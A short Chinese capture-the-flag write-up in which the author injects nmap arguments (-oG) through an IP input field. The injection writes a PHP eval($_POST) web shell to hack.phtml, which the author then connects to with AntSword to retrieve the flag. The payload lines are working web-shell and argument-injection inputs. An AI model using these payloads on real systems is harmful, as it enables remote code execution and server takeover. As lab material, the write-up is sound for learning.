打开题目
输入127.0.0.1
可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令
127.0.0.1 | ls
可以看到|被\转义,尝试使用;:
直接放入Payload:
' <?php @eval($_POST["hack"]);?> -oG hack.php '
尝试修改文件名后缀为phtml:
' <?php @eval($_POST["hack"]);?> -oG hack.phtml '
加上扫描的地址:127.0.0.1:
127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'
得到
查看扫描列表:
查看写入的文件,即访问hack.phtml
蚁剑连接
在根目录找到了flag
